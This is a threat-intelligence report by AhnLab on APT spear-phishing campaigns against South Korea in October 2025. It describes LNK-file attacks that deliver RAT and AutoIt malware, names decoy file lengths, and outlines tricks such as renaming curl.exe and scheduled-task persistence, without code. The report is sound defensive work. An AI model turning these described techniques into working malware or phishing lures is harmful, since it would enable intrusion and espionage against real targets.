October 2025 APT Attack Trends Report (South Korea)
Overview
AhnLab is monitoring Advanced Persistent Threat (APT) attacks in South Korea by utilizing their own infrastructure. This report covers the classification, statistics, and features of APT attacks in South Korea that were identified in October 2025.
Figure 1. Statistics of APT attacks in South Korea in October 2025
The majority of APT attacks identified in South Korea were distributed using the spear phishing method. In particular, attacks using JSE files increased compared to the past and accounted for the largest proportion of attacks in October 2025.
Trend of APT Attacks in South Korea
The following are the details of the cases and features of the types of breaches in the APT attacks against South Korea that were identified in October 2025.
1) Spear Phishing
Spear Phishing is a type of phishing attack that targets specific individuals or groups. Unlike regular phishing attacks, threat actors collect and gather information about their targets during the reconnaissance phase before launching their attacks. Threat actors utilize the gathered information to craft their phishing emails, making it more likely for recipients to trust the emails. There are also cases where threat actors forge the sender’s address through email spoofing. Most spear phishing attacks include malicious attachments or links in the emails, which prompt users to open them.
The following are the types of malware distributed using this technique.
1.1 Attacks Using LNK
Type A
This type involves executing RAT malware. It is mainly distributed in a compressed file format along with normal files. The distributed LNK file contains a malicious PowerShell command. The malware utilizes the Dropbox API or Google Drive to download the malware. It also creates additional script files and obfuscated RAT malware in the user’s PC. The executed RAT malware performs various malicious behaviors according to the threat actor’s command, such as keylogging and capturing screenshots. The identified RAT types are XenoRAT and RoKRAT.
The confirmed file name is as follows.
|
File Name |
| Vol. 1078 (Oct 2, 2025) No. ** (Part ***) |
| 25.09.30-4025(****)***_Submission Schedule.lnk |
| How Will We Deal with “North Korea Armed with Nuclear Weapons”.lnk |
| Establishment of Inter-Korean Civilian Exchange and Cooperation Association (Draft) |
| Articles of Association of the Inter-Korean Civilian Exchange and Cooperation Association.lnk |
| Form for Writing Inheritance-Related Materials.lnk |
| Establishment Purpose Statement (October 7, 2025).lnk |
| General Election of the Ja Min Party (Dakaichi).lnk |
| Cost Estimate for the Institute of Unification and National Security Studies.lnk |
| North Korea’s Nuclear Threat in the Trump 2.0 Era, the U.S.-China Power Competition, and South Korea’s Nuclear Options.lnk |
| Association Organizational Chart (October 11, 2025).lnk |
Table 1. Confirmed File Names
Type B
This type is responsible for downloading AutoIt malware. When the malicious PowerShell command in the LNK file is executed, it accesses an external URL and downloads additional files. A notable characteristic is that during this process, the curl.exe program is copied under a different file name (e.g., WpqNoXz.exe) and then executed. As a result, a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded files are then registered in the task scheduler to ensure that they are executed continuously. The malicious AutoIt script is capable of executing commands, searching directories, uploading files, and downloading files.
The confirmed file name is as follows.
|
File Name |
| Statement of the Source of Funds Not Reported (Enforcement Decree of the Value-Added Tax Act).hwp.lnk |
| Attachment 1. North Korean Human Rights Organization_Product Sponsorship_Proposal_**.hwp.lnk |
Table 2. Confirmed file names
Decoy files are used to make it appear as if the user has executed a legitimate file.
Figure 2. Decoy file
